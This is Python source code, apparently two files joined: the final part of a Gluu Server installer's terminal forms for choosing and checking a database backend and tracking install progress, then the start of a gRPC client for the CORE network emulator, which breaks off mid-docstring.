oxd_connection_result = propertiesUtils.check_oxd_server(oxd_server_https)
if oxd_connection_result != True:
npyscreen.notify_confirm(
msg.oxd_connection_error.format(oxd_server_https, oxd_connection_result),
title="Warning"
)
return
oxd_hostname, oxd_port = self.parentApp.gluuInstaller.parse_url(oxd_server_https)
oxd_ssl_result = propertiesUtils.check_oxd_ssl_cert(oxd_hostname, oxd_port)
if oxd_ssl_result:
npyscreen.notify_confirm(
msg.oxd_ssl_cert_error.format(oxd_ssl_result['CN'], oxd_hostname),
title="Warning")
return
Config.oxd_server_https = oxd_server_https
propertiesUtils.check_oxd_server_https()
if self.installOxd.value and not 'installOxd' in self.services_before_this_form:
result = npyscreen.notify_yes_no(msg.ask_use_gluu_storage_oxd, title=msg.ask_use_gluu_storage_oxd_title)
if result:
Config.oxd_use_gluu_storage = True
# check if we have enough memory
if not self.parentApp.jettyInstaller.calculate_selected_aplications_memory():
result = npyscreen.notify_yes_no(msg.memory_warning, title="Warning")
if not result:
return
if Config.installed_instance:
self.parentApp.switchForm('DisplaySummaryForm')
else:
self.parentApp.switchForm('DBBackendForm')
def casa_oxd_option_changed(self, widget):
if self.installOxd.value:
self.oxd_url.hidden = True
elif self.installCasa.value and not self.installOxd.value:
self.oxd_url.hidden = False
elif not self.installCasa.value:
self.oxd_url.hidden = True
self.oxd_url.update()
def backButtonPressed(self):
self.parentApp.switchForm('HostForm')
def make_title(text):
return '-'*10 + ' '+ text +' '+ '-'*10
class DBBackendForm(GluuSetupForm):
def create(self):
self.backends = self.add(npyscreen.TitleSelectOne, max_height=8, value = [0,], name=msg.chose_backend,
values = [], scroll_exit=True)
self.beta_warning_label = self.add(npyscreen.TitleFixedText, name=msg.mysql_spanner_beta, relx=23, editable=False, labelColor='WARNING', hidden=True)
self.backends.value_changed_callback = self.backend_changed
def do_beforeEditing(self):
self.backend_types = ['Local OpenDj',
'Remote OpenDj',
'Remote Couchbase',
'Local MySQL',
'Remote MySQL',
'Cloud Spanner',
'Spanner Emulator',
]
if 'couchbase' in propertiesUtils.getBackendTypes():
self.backend_types.insert(2, 'Local Couchbase')
self.backends.values = self.backend_types
self.backends.update()
def backend_changed(self, widget):
selected_backend = self.backends.values[self.backends.value[0]]
self.beta_warning_label.hidden = not ('MySQL' in selected_backend or 'Spanner' in selected_backend)
self.beta_warning_label.update()
def nextButtonPressed(self):
self.parentApp.backend_type_str = self.backend_types[self.backends.value[0]]
if self.parentApp.backend_type_str == 'Local OpenDj':
Config.ldap_install = static.InstallTypes.LOCAL
Config.cb_install = static.InstallTypes.NONE
Config.rdbm_install = False
self.parentApp.switchForm('DBLDAPForm')
elif self.parentApp.backend_type_str == 'Remote OpenDj':
Config.ldap_install = static.InstallTypes.REMOTE
Config.cb_install = static.InstallTypes.NONE
Config.rdbm_install = False
self.parentApp.switchForm('DBLDAPForm')
elif self.parentApp.backend_type_str == 'Local Couchbase':
Config.ldap_install = static.InstallTypes.NONE
Config.rdbm_install = False
Config.cb_install = static.InstallTypes.LOCAL
self.parentApp.switchForm('DBCBForm')
elif self.parentApp.backend_type_str == 'Remote Couchbase':
Config.ldap_install = static.InstallTypes.NONE
Config.rdbm_install = False
Config.cb_install = static.InstallTypes.REMOTE
self.parentApp.switchForm('DBCBForm')
elif self.parentApp.backend_type_str == 'Local MySQL':
Config.ldap_install = static.InstallTypes.NONE
Config.rdbm_install_type = static.InstallTypes.LOCAL
Config.rdbm_install = True
Config.rdbm_type = 'mysql'
if not Config.rdbm_password:
Config.rdbm_password = propertiesUtils.getPW(special='.*=+-()[]{}')
if not Config.rdbm_user:
Config.rdbm_user = 'gluu'
self.parentApp.switchForm('DBRDBMForm')
elif self.parentApp.backend_type_str == 'Remote MySQL':
Config.ldap_install = static.InstallTypes.NONE
Config.rdbm_install_type = static.InstallTypes.REMOTE
Config.rdbm_install = True
Config.rdbm_type = 'mysql'
Config.rdbm_password = ''
self.parentApp.switchForm('DBRDBMForm')
elif self.parentApp.backend_type_str in ('Cloud Spanner', 'Spanner Emulator'):
if Config.installSaml:
npyscreen.notify_confirm(msg.spanner_idp_warning + ' ' + msg.idp_unselect, title="Warning")
return
Config.rdbm_type = 'spanner'
Config.rdbm_install = True
Config.ldap_install = static.InstallTypes.NONE
Config.rdbm_install_type = static.InstallTypes.REMOTE
self.parentApp.switchForm('DBSpannerForm')
def backButtonPressed(self):
self.parentApp.switchForm('ServicesForm')
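# Form navigation implemented via parentApp.switchForm():
#   MAIN -> HostForm -> ServicesForm -> DBBackendForm
#        -> (DBLDAPForm | DBCBForm | DBRDBMForm | DBSpannerForm)
#        -> DisplaySummaryForm -> InstallStepsForm
# ServicesForm jumps straight to DisplaySummaryForm when configuring an
# already installed instance, and the legacy DBBackendFormOld can route
# through StorageSelectionForm for hybrid LDAP/Couchbase persistence.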
class DBLDAPForm(GluuSetupForm):
def create(self):
self.ldap_password = self.add(npyscreen.TitleText, name=msg.ldap_admin_password_label, begin_entry_at=22)
self.ldap_hosts = self.add(npyscreen.TitleText, name=msg.ldap_remote_label, begin_entry_at=22)
def do_beforeEditing(self):
if Config.ldap_install == static.InstallTypes.LOCAL:
self.ldap_hosts.hidden = True
else:
self.ldap_hosts.hidden = False
if Config.ldap_install == static.InstallTypes.LOCAL:
if not Config.ldapPass:
self.ldap_password.value = Config.oxtrust_admin_password
else:
self.ldap_password.value = ''
self.ldap_password.update()
self.ldap_hosts.update()
def nextButtonPressed(self):
if Config.ldap_install == static.InstallTypes.LOCAL:
Config.ldap_hostname = 'localhost'
Config.ldapPass = self.ldap_password.value
# check if opendj ports are available
used_ports = base.check_port_available((1389, 4444, 1636))
s, aux, w = ('', 'is', 'this') if len(used_ports) == 1 else ('s', 'are', 'these')
if used_ports:
port_msg = msg.opendj_port_availibility.format(s, ','.join(used_ports), aux, w)
npyscreen.notify_confirm(port_msg, title="Warning")
return
elif Config.ldap_install == static.InstallTypes.REMOTE:
Config.ldap_hostname = self.ldap_hosts.value
Config.ldapPass = self.ldap_password.value
npyscreen.notify("Please wait while checking remote ldap connection", title="Wait!")
result = propertiesUtils.check_remote_ldap(
self.ldap_hosts.value,
Config.ldap_binddn,
self.ldap_password.value
)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
self.parentApp.switchForm('DisplaySummaryForm')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
class DBCBForm(GluuSetupForm):
def create(self):
self.cb_admin = self.add(npyscreen.TitleText, name=msg.cb_username_label, begin_entry_at=22)
self.cb_password = self.add(npyscreen.TitleText, name=msg.cb_password_label, begin_entry_at=22)
self.cb_hosts = self.add(npyscreen.TitleText, name=msg.cb_hosts_label, begin_entry_at=22)
def do_beforeEditing(self):
if Config.cb_install == static.InstallTypes.LOCAL:
self.cb_hosts.hidden = True
elif Config.cb_install == static.InstallTypes.REMOTE:
self.cb_hosts.hidden = False
self.cb_hosts.update()
def nextButtonPressed(self):
Config.cb_password = self.cb_password.value
if Config.cb_install == static.InstallTypes.LOCAL:
Config.couchbase_hostname = 'localhost'
elif Config.cb_install == static.InstallTypes.REMOTE:
Config.couchbase_hostname = self.cb_hosts.value
Config.couchebaseClusterAdmin = self.cb_admin.value
npyscreen.notify("Please wait while checking remote Couchbase connection", title="Wait!")
result = propertiesUtils.test_cb_servers(self.cb_hosts.value)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
self.parentApp.switchForm('DisplaySummaryForm')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
class DBRDBMForm(GluuSetupForm):
def create(self):
self.rdbm_db = self.add(npyscreen.TitleText, name=msg.rdbm_db_label.format(Config.rdbm_type.upper()), begin_entry_at=22)
self.rdbm_user = self.add(npyscreen.TitleText, name=msg.rdbm_username_label.format(Config.rdbm_type.upper()), begin_entry_at=22)
self.rdbm_password = self.add(npyscreen.TitleText, name=msg.rdbm_password_label.format(Config.rdbm_type.upper()), begin_entry_at=22)
self.rdbm_host = self.add(npyscreen.TitleText, name=msg.rdbm_host_label.format(Config.rdbm_type.upper()), begin_entry_at=22)
self.rdbm_port = self.add(npyscreen.TitleText, name=msg.rdbm_db_port_label.format(Config.rdbm_type.upper()), begin_entry_at=22)
def do_beforeEditing(self):
if Config.rdbm_install_type == static.InstallTypes.LOCAL:
self.rdbm_host.hidden = True
self.rdbm_port.hidden = True
elif Config.rdbm_install_type == static.InstallTypes.REMOTE:
self.rdbm_host.hidden = False
self.rdbm_port.hidden = False
for vname in ('rdbm_user', 'rdbm_password', 'rdbm_host', 'rdbm_db', 'rdbm_port'):
npyscr_obj = getattr(self, vname)
npyscr_obj.value = str(Config.get(vname)) if Config.get(vname) else ''
npyscr_obj.update()
def nextButtonPressed(self):
Config.rdbm_user = self.rdbm_user.value
Config.rdbm_password = self.rdbm_password.value
Config.rdbm_db = self.rdbm_db.value
if Config.rdbm_install_type == static.InstallTypes.LOCAL:
Config.rdbm_host = 'localhost'
Config.rdbm_port = 3306
else:
Config.rdbm_host = self.rdbm_host.value
if not self.rdbm_port.value.isnumeric():
npyscreen.notify_confirm("Port must be integer", title="Warning")
return
Config.rdbm_port = int(self.rdbm_port.value)
npyscreen.notify("Please wait while checking mysql connection", title="Wait!")
try:
pymysql.connect(host=Config.rdbm_host, user=Config.rdbm_user, password=Config.rdbm_password, database=Config.rdbm_db, port=Config.rdbm_port)
except Exception as e:
npyscreen.notify_confirm(str(e), title="Warning")
return
self.parentApp.switchForm('DisplaySummaryForm')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
class DBSpannerForm(GluuSetupForm):
def create(self):
self.spanner_project = self.add(npyscreen.TitleText, name=msg.spanner_project_label, begin_entry_at=22)
self.spanner_instance = self.add(npyscreen.TitleText, name=msg.spanner_instance_label, begin_entry_at=22)
self.spanner_database = self.add(npyscreen.TitleText, name=msg.spanner_database_label, begin_entry_at=22)
self.google_application_credentials = self.add(npyscreen.TitleFilenameCombo, name=msg.spanner_cred_label, begin_entry_at=40)
self.spanner_emulator_host = self.add(npyscreen.TitleText, name=msg.spanner_emulator_host_label, begin_entry_at=22)
def do_beforeEditing(self):
#self.rdbm_db.value = self.parentApp.backend_type_str
#self.rdbm_db.update()
if self.parentApp.backend_type_str == 'Spanner Emulator':
self.google_application_credentials.hidden = True
self.spanner_emulator_host.hidden = False
else:
self.google_application_credentials.hidden = False
self.spanner_emulator_host.hidden = True
self.google_application_credentials.update()
for vname in ('spanner_project', 'spanner_instance', 'spanner_database', 'spanner_emulator_host', 'google_application_credentials'):
npyscr_obj = getattr(self, vname)
npyscr_obj.value = str(Config.get(vname)) if Config.get(vname) else ''
npyscr_obj.update()
def nextButtonPressed(self):
if self.parentApp.backend_type_str == 'Spanner Emulator':
Config.spanner_emulator_host = self.spanner_emulator_host.value
Config.google_application_credentials = ''
else:
Config.spanner_emulator_host = ''
Config.google_application_credentials = self.google_application_credentials.value
if not os.path.isfile(Config.google_application_credentials):
npyscreen.notify_confirm("Please enter Google application creditentals file", title="Warning")
return
else:
try:
with open(Config.google_application_credentials) as f:
json.load(f)
except:
npyscreen.notify_confirm("Please enter valid Google application creditentals file", title="Warning")
return
Config.spanner_project = self.spanner_project.value
Config.spanner_instance = self.spanner_instance.value
Config.spanner_database = self.spanner_database.value
npyscreen.notify("Please wait while checking spanner connection", title="Wait!")
try:
spanner = Spanner()
spanner.get_session()
except Exception as e:
npyscreen.notify_confirm("ERROR getting session from spanner: {}".format(e), title="Warning")
return
self.parentApp.switchForm('DisplaySummaryForm')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
class DBBackendFormOld(GluuSetupForm):
def create(self):
self.editw = 2
self.add(npyscreen.FixedText, value=make_title(msg.ask_ldap_install), editable=False)
self.ask_ldap = self.add(npyscreen.SelectOne, max_height=3,
values = msg.ldap_install_options, scroll_exit=True)
self.ask_ldap.value_changed_callback = self.ldap_option_changed
self.ldap_password = self.add(npyscreen.TitleText, name=msg.password_label)
self.ldap_hosts = self.add(npyscreen.TitleText, name=msg.hosts_label)
self.ldap_option_changed(self.ask_ldap)
self.add(npyscreen.FixedText, value=make_title(msg.ask_cb_install), rely=10, editable=False)
self.ask_cb = self.add(npyscreen.SelectOne, max_height=3,
values = msg.cb_install_options, scroll_exit=True)
self.ask_cb.value_changed_callback = self.cb_option_changed
self.cb_admin = self.add(npyscreen.TitleText, name=msg.username_label)
self.cb_password = self.add(npyscreen.TitleText, name=msg.password_label)
self.cb_hosts = self.add(npyscreen.TitleText, name=msg.hosts_label)
self.cb_option_changed(self.ask_cb)
def do_beforeEditing(self):
self.ask_ldap.value = [int(Config.ldap_install)]
if Config.ldap_install == static.InstallTypes.REMOTE:
self.ldap_hosts.hidden = False
else:
self.ldap_hosts.hidden = True
if not Config.ldap_install:
self.ldap_password.hidden = True
else:
self.ldap_password.hidden = False
if Config.ldap_install == static.InstallTypes.LOCAL:
if not Config.ldapPass:
self.ldap_password.value = Config.oxtrust_admin_password
self.ldap_hosts.value = Config.ldap_hostname
self.ask_cb.value = [int(Config.cb_install)]
if not Config.cb_install:
self.cb_admin.hidden = True
else:
self.cb_admin.hidden = False
if Config.cb_install == static.InstallTypes.REMOTE:
self.cb_hosts.hidden = False
else:
self.cb_hosts.hidden = True
if not Config.cb_install:
self.cb_password.hidden = True
else:
self.cb_password.hidden = False
if Config.cb_install == static.InstallTypes.LOCAL:
if not Config.cb_password:
self.cb_password.value = Config.oxtrust_admin_password
self.cb_hosts.value = Config.get('couchbase_hostname', '')
self.cb_admin.value = Config.get('couchebaseClusterAdmin','')
self.ldap_hosts.update()
self.ask_ldap.update()
self.ldap_hosts.update()
self.ldap_password.update()
self.cb_hosts.update()
self.ask_cb.update()
self.cb_hosts.update()
self.cb_password.update()
def nextButtonPressed(self):
msg.backend_types = []
Config.ldap_install = str(self.ask_ldap.value[0]) if self.ask_ldap.value[0] else 0
if Config.ldap_install == static.InstallTypes.LOCAL:
Config.ldap_hostname = 'localhost'
Config.ldapPass = self.ldap_password.value
# check if opendj ports are available
used_ports = base.check_port_available((1389, 4444, 1636))
s, aux, w = ('', 'is', 'this') if len(used_ports) == 1 else ('s', 'are', 'these')
if used_ports:
port_msg = msg.opendj_port_availibility.format(s, ','.join(used_ports), aux, w)
npyscreen.notify_confirm(port_msg, title="Warning")
return
elif Config.ldap_install == static.InstallTypes.REMOTE:
Config.ldap_hostname = self.ldap_hosts.value
Config.ldapPass = self.ldap_password.value
result = propertiesUtils.check_remote_ldap(
self.ldap_hosts.value,
Config.ldap_binddn,
self.ldap_password.value
)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
Config.cb_install = str(self.ask_cb.value[0]) if self.ask_cb.value[0] else 0
if Config.cb_install == static.InstallTypes.LOCAL:
Config.couchbase_hostname = 'localhost'
Config.cb_password = self.cb_password.value
elif Config.cb_install == static.InstallTypes.REMOTE:
Config.couchbase_hostname = self.cb_hosts.value
Config.couchebaseClusterAdmin = self.cb_admin.value
Config.cb_password = self.cb_password.value
result = propertiesUtils.test_cb_servers(self.cb_hosts.value)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
if Config.ldap_install == static.InstallTypes.LOCAL and not propertiesUtils.checkPassword(Config.ldapPass):
npyscreen.notify_confirm(msg.weak_password.format('OpenDj'), title="Warning")
return
if Config.cb_install == static.InstallTypes.LOCAL and not propertiesUtils.checkPassword(Config.cb_password):
npyscreen.notify_confirm(msg.weak_password.format('Couchbase Server'), title="Warning")
return
if Config.ldap_install or Config.cb_install:
if Config.ldap_install and Config.cb_install:
Config.persistence_type = 'hybrid'
self.parentApp.switchForm('StorageSelectionForm')
else:
storage_list = list(Config.couchbaseBucketDict.keys())
storage = 'ldap'
if Config.cb_install:
storage = 'couchbase'
for s in storage_list:
Config.mappingLocations[s] = storage
Config.persistence_type = storage
self.parentApp.switchForm('DisplaySummaryForm')
else:
npyscreen.notify_confirm(msg.notify_select_backend, title="Warning")
return
def ldap_option_changed(self, widget):
if self.ask_ldap.value:
if not self.ask_ldap.value[0]:
self.ldap_password.hidden = True
self.ldap_hosts.hidden = True
elif str(self.ask_ldap.value[0]) == static.InstallTypes.LOCAL:
self.ldap_password.hidden = False
self.ldap_hosts.hidden = True
elif str(self.ask_ldap.value[0]) == static.InstallTypes.REMOTE:
self.ldap_password.hidden = False
self.ldap_hosts.hidden = False
self.ldap_password.update()
self.ldap_hosts.update()
def cb_option_changed(self, widget):
if self.ask_cb.value:
if not self.ask_cb.value[0]:
self.cb_admin.hidden = True
self.cb_password.hidden = True
self.cb_hosts.hidden = True
elif str(self.ask_cb.value[0]) == static.InstallTypes.LOCAL:
self.cb_admin.hidden = False
self.cb_hosts.hidden = False
self.cb_password.hidden = False
self.cb_hosts.hidden = True
elif str(self.ask_cb.value[0]) == static.InstallTypes.REMOTE:
self.cb_admin.hidden = False
self.cb_password.hidden = False
self.cb_hosts.hidden = False
self.cb_admin.update()
self.cb_password.update()
self.cb_hosts.update()
def backButtonPressed(self):
self.parentApp.switchForm('ServicesForm')
class StorageSelectionForm(GluuSetupForm):
def create(self):
self.ldap_storage = self.add(npyscreen.TitleMultiSelect, begin_entry_at=30, max_height=len(Config.couchbaseBucketDict),
values=list(Config.couchbaseBucketDict.keys()), name=msg.DBBackendForm_label, scroll_exit=True)
self.add(npyscreen.FixedText, value=msg.unselected_storages, rely=len(Config.couchbaseBucketDict)+4, editable=False, color='STANDOUT')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
def do_beforeEditing(self):
self.ldap_storage.values = list(Config.couchbaseBucketDict.keys())
value = []
for i, s in enumerate(Config.couchbaseBucketDict.keys()):
if Config.mappingLocations[s] == 'ldap':
value.append(i)
self.ldap_storage.value = value
self.ldap_storage.update()
def nextButtonPressed(self):
storage_list = list(Config.couchbaseBucketDict.keys())
for i, s in enumerate(storage_list):
if i in self.ldap_storage.value:
Config.mappingLocations[s] = 'ldap'
else:
Config.mappingLocations[s] = 'couchbase'
self.parentApp.switchForm('DisplaySummaryForm')
class DisplaySummaryForm(GluuSetupForm):
myfields_1 = ["hostname", "orgName", "os_type", "city", "state", "countryCode",
"application_max_ram"]
myfields_2 = [ "installOxAuth", "installOxTrust"]
if os.environ.get('GLUU_SERVICES'):
myfields_2 += os.environ['GLUU_SERVICES'].split()
else:
myfields_2 += ["installSaml",
"installPassport", "installGluuRadius",
"installOxd", "installCasa",
'installScimServer', 'installFido2']
myfields_2 += ["java_type","backend_types", 'ldap_storages']
def create(self):
for i, wn in enumerate(self.myfields_1):
setattr(self,
wn,
self.add(
npyscreen.TitleFixedText,
name=getattr(msg, wn+'_label'),
value="",
begin_entry_at=24,
editable=False,
)
)
sec_col_n = math.ceil(len(self.myfields_2)/2.0)
for j, wn in enumerate(self.myfields_2):
if j < sec_col_n:
relx=2
rely = i+4+j
else:
relx=39
rely = i+4+j-sec_col_n
setattr(self,
wn,
self.add(
npyscreen.TitleFixedText,
name=getattr(msg, wn+'_label'),
value="",
begin_entry_at=20,
editable=False,
rely=rely,
relx=relx,
)
)
def do_beforeEditing(self):
for wn in self.myfields_1+self.myfields_2:
w = getattr(self, wn)
if getClassName(w) == 'TitleFixedText':
if wn == 'backend_types':
bt_ = []
if Config.ldap_install == static.InstallTypes.LOCAL:
bt_.append('opendj')
elif Config.ldap_install == static.InstallTypes.REMOTE:
bt_.append('opendj[R]')
if Config.cb_install == static.InstallTypes.LOCAL:
bt_.append('couchbase')
elif Config.cb_install == static.InstallTypes.REMOTE:
bt_.append('couchbase[R]')
if Config.rdbm_install_type == static.InstallTypes.LOCAL:
bt_.append('{}'.format(Config.rdbm_type))
elif Config.rdbm_install_type == static.InstallTypes.REMOTE:
if Config.rdbm_type == 'spanner':
if Config.spanner_emulator_host:
bt_.append('spanner[E]')
else:
bt_.append('spanner[C]')
else:
bt_.append('{}[R]'.format(Config.rdbm_type))
w.value = ', '.join(bt_)
elif wn == 'ldap_storages':
if Config.ldap_install and Config.cb_install:
wds_ = []
for k in Config.mappingLocations:
if Config.mappingLocations[k] == 'ldap':
wds_.append(k)
w.hidden = False
w.value = ', '.join(wds_)
else:
w.hidden = True
else:
val = Config.get(wn, 'NA')
w.value = str(val)
if wn in Config.addPostSetupService:
w.value += ' *'
w.labelColor = 'STANDOUT'
w.update()
if self.parentApp.setup_loaded:
self.button_back.hidden=True
self.button_back.update()
def backButtonPressed(self):
if Config.installed_instance:
self.parentApp.switchForm('MAIN')
elif Config.ldap_install and Config.cb_install:
self.parentApp.switchForm('StorageSelectionForm')
else:
self.parentApp.switchForm('DBBackendForm')
def nextButtonPressed(self):
# Validate Properties
propertiesUtils.check_properties()
self.parentApp.switchForm('InstallStepsForm')
class InputBox(npyscreen.BoxTitle):
_contained_widget = npyscreen.MultiLineEdit
class MySlider(npyscreen.SliderPercent):
pass
class InstallStepsForm(GluuSetupForm):
desc_value = None
current_stage = 0
def create(self):
self.progress_percantage = self.add(MySlider, rely=4, accuracy=0, editable=False, name="Progress")
self.installing = self.add(npyscreen.TitleFixedText, name=msg.installing_label, value="", editable=False)
self.description = self.add(InputBox, name="", max_height=6, rely=8)
def do_beforeEditing(self):
gluuProgress.before_start()
self.progress_percantage.out_of = len(gluuProgress.services) + 1
self.progress_percantage.update()
t=threading.Thread(target=self.parentApp.do_installation, args=())
t.daemon = True
t.start()
def do_while_waiting(self):
if not Config.thread_queue.empty():
data = Config.thread_queue.get()
current = data.get('current')
current_message = data.get('msg','')
if current == static.COMPLETED:
self.progress_percantage.value = self.progress_percantage.out_of
self.progress_percantage.update()
if Config.post_messages:
npyscreen.notify_confirm('\n'.join(Config.post_messages), title="Post Install Messages", wide=True)
msg_text = msg.post_installation if Config.installed_instance else msg.installation_completed.format(Config.hostname)
npyscreen.notify_confirm(msg_text, title="Completed")
self.parentApp.do_notify = False
self.parentApp.switchForm(None)
elif current == static.ERROR:
npyscreen.notify_confirm(msg.installation_error +"\n"+current_message, title="ERROR")
self.parentApp.do_notify = False
self.parentApp.switchForm(None)
self.progress_percantage.value = self.current_stage
self.progress_percantage.update()
self.installing.value = current_message
self.installing.update()
if self.desc_value != current:
if self.current_stage < self.progress_percantage.out_of:
self.current_stage += 1
if hasattr(msg, 'installation_description_' + str(current)):
desc = getattr(msg, 'installation_description_' + str(current))
else:
desc = msg.installation_description_gluu
self.description.value = '\n'.join(textwrap.wrap(desc, self.columns - 10))
self.description.update()
self.desc_value = current
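# Note (derived from do_while_waiting above): items placed on Config.thread_queue
# are dicts with a 'current' key (a service name, or one of the sentinels
# static.COMPLETED / static.ERROR) and an optional 'msg' key holding the text shown
# next to the progress bar; the description box is filled from
# msg.installation_description_<current>, falling back to msg.installation_description_gluu.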
def backButtonPressed(self):
pass
def nextButtonPressed(self):
pass
GSA = GluuSetupApp()
|
client.py
|
"""
gRpc client for interfacing with CORE, when gRPC mode is enabled.
"""
from __future__ import print_function
import logging
import threading
from contextlib import contextmanager
import grpc
from core.api.grpc import core_pb2
from core.api.grpc import core_pb2_grpc
from core.nodes.ipaddress import Ipv4Prefix, Ipv6Prefix, MacAddress
class InterfaceHelper(object):
"""
Convenience class to help generate IP4 and IP6 addresses for gRPC clients.
"""
def __init__(self, ip4_prefix=None, ip6_prefix=None):
"""
Creates an InterfaceHelper object.
:param str ip4_prefix: ip4 prefix to use for generation
:param str ip6_prefix: ip6 prefix to use for generation
:raises ValueError: when both ip4 and ip6 prefixes have not been provided
"""
if not ip4_prefix and not ip6_prefix:
raise ValueError("ip4 or ip6 must be provided")
self.ip4 = None
if ip4_prefix:
self.ip4 = Ipv4Prefix(ip4_prefix)
self.ip6 = None
if ip6_prefix:
self.ip6 = Ipv6Prefix(ip6_prefix)
def ip4_address(self, node_id):
"""
Convenience method to return the IP4 address for a node.
:param int node_id: node id to get IP4 address for
:return: IP4 address or None
:rtype: str
"""
if not self.ip4:
raise ValueError("ip4 prefixes have not been set")
return str(self.ip4.addr(node_id))
def ip6_address(self, node_id):
"""
Convenience method to return the IP6 address for a node.
:param int node_id: node id to get IP6 address for
:return: IP6 address or None
:rtype: str
"""
if not self.ip6:
raise ValueError("ip6 prefixes have not been set")
return str(self.ip6.addr(node_id))
def create_interface(self, node_id, interface_id, name=None, mac=None):
"""
Creates interface data for linking nodes, using the node's unique id for generation, along with a random
mac address, unless provided.
:param int node_id: node id to create interface for
:param int interface_id: interface id for interface
:param str name: name to set for interface, default is eth{id}
:param str mac: mac address to use for this interface, default is random generation
:return: new interface data for the provided node
:rtype: core_pb2.Interface
"""
# generate ip4 data
ip4 = None
ip4_mask = None
if self.ip4:
ip4 = str(self.ip4.addr(node_id))
ip4_mask = self.ip4.prefixlen
# generate ip6 data
ip6 = None
ip6_mask = None
if self.ip6:
ip6 = str(self.ip6.addr(node_id))
ip6_mask = self.ip6.prefixlen
# random mac
if not mac:
mac = MacAddress.random()
return core_pb2.Interface(
id=interface_id,
name=name,
ip4=ip4,
ip4mask=ip4_mask,
ip6=ip6,
ip6mask=ip6_mask,
mac=str(mac)
)
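# Illustrative sketch (not part of the original module): how InterfaceHelper is
# typically combined with create_interface() to build per-node interface data
# before linking nodes. The prefixes and node ids below are made-up example values.
def _example_interface_helper():
    """Build interface data for two hypothetical nodes using InterfaceHelper."""
    helper = InterfaceHelper(ip4_prefix="10.83.0.0/16", ip6_prefix="2001::/64")
    # interface for node 1, id 0; addresses are derived from the node id
    iface_one = helper.create_interface(node_id=1, interface_id=0)
    # interface for node 2, id 0, with an explicit name
    iface_two = helper.create_interface(node_id=2, interface_id=0, name="eth0")
    return iface_one, iface_two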
def stream_listener(stream, handler):
"""
Listen for stream events and provide them to the handler.
:param stream: grpc stream that will provide events
:param handler: function that handles an event
:return: nothing
"""
try:
for event in stream:
handler(event)
except grpc.RpcError as e:
if e.code() == grpc.StatusCode.CANCELLED:
logging.debug("stream closed")
else:
logging.exception("stream error")
def start_streamer(stream, handler):
"""
Convenience method for starting a grpc stream thread for handling streamed events.
:param stream: grpc stream that will provide events
:param handler: function that handles an event
:return: nothing
"""
thread = threading.Thread(target=stream_listener, args=(stream, handler))
thread.daemon = True
thread.start()
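# Illustrative sketch (assumption, not from the original module): a minimal handler
# that could be passed to start_streamer(); it simply logs each event received from
# a gRPC stream such as the ones returned by Events or Throughputs.
def _example_event_handler(event):
    """Log a streamed event; a real handler would inspect the event's fields."""
    logging.info("received stream event: %s", event)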
class CoreGrpcClient(object):
"""
Provides convenience methods for interfacing with the CORE grpc server.
"""
def __init__(self, address="localhost:50051"):
"""
Creates a CoreGrpcClient instance.
:param str address: grpc server address to connect to
"""
self.address = address
self.stub = None
self.channel = None
def create_session(self, session_id=None):
"""
Create a session.
:param int session_id: id for session, default is None and one will be created for you
:return: response with created session id
:rtype: core_pb2.CreateSessionResponse
"""
request = core_pb2.CreateSessionRequest(session_id=session_id)
return self.stub.CreateSession(request)
def delete_session(self, session_id):
"""
Delete a session.
:param int session_id: id of session
:return: response with result of deletion success or failure
:rtype: core_pb2.DeleteSessionResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.DeleteSessionRequest(session_id=session_id)
return self.stub.DeleteSession(request)
def get_sessions(self):
"""
Retrieves all currently known sessions.
:return: response with a list of currently known sessions, their state, and number of nodes
:rtype: core_pb2.GetSessionsResponse
"""
return self.stub.GetSessions(core_pb2.GetSessionsRequest())
def get_session(self, session_id):
"""
Retrieve a session.
:param int session_id: id of session
:return: response with sessions state, nodes, and links
:rtype: core_pb2.GetSessionResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionRequest(session_id=session_id)
return self.stub.GetSession(request)
def get_session_options(self, session_id):
"""
Retrieve session options.
:param int session_id: id of session
:return: response with a list of configuration groups
:rtype: core_pb2.GetSessionOptionsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionOptionsRequest(session_id=session_id)
return self.stub.GetSessionOptions(request)
def set_session_options(self, session_id, config):
"""
Set options for a session.
:param int session_id: id of session
:param dict[str, str] config: configuration values to set
:return: response with result of success or failure
:rtype: core_pb2.SetSessionOptionsResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetSessionOptionsRequest(session_id=session_id, config=config)
return self.stub.SetSessionOptions(request)
def get_session_location(self, session_id):
"""
Get session location.
:param int session_id: id of session
:return: response with session position reference and scale
:rtype: core_pb2.GetSessionLocationResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.GetSessionLocationRequest(session_id=session_id)
return self.stub.GetSessionLocation(request)
def set_session_location(self, session_id, x=None, y=None, z=None, lat=None, lon=None, alt=None, scale=None):
"""
Set session location.
:param int session_id: id of session
:param float x: x position
:param float y: y position
:param float z: z position
:param float lat: latitude position
:param float lon: longitude position
:param float alt: altitude position
:param float scale: geo scale
:return: response with result of success or failure
:rtype: core_pb2.SetSessionLocationResponse
:raises grpc.RpcError: when session doesn't exist
"""
position = core_pb2.SessionPosition(x=x, y=y, z=z, lat=lat, lon=lon, alt=alt)
request = core_pb2.SetSessionLocationRequest(session_id=session_id, position=position, scale=scale)
return self.stub.SetSessionLocation(request)
def set_session_state(self, session_id, state):
"""
Set session state.
:param int session_id: id of session
:param core_pb2.SessionState state: session state to transition to
:return: response with result of success or failure
:rtype: core_pb2.SetSessionStateResponse
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.SetSessionStateRequest(session_id=session_id, state=state)
return self.stub.SetSessionState(request)
def events(self, session_id, handler):
"""
Listen for session events.
:param int session_id: id of session
:param handler: handler for every event
:return: nothing
:raises grpc.RpcError: when session doesn't exist
"""
request = core_pb2.EventsRequest(session_id=session_id)
stream = self.stub.Events(request)
start_streamer(stream, handler)
def throughputs(self, handler):
"""
Listen for throughput events with information for interfaces and bridges.
:param handler: handler for every event
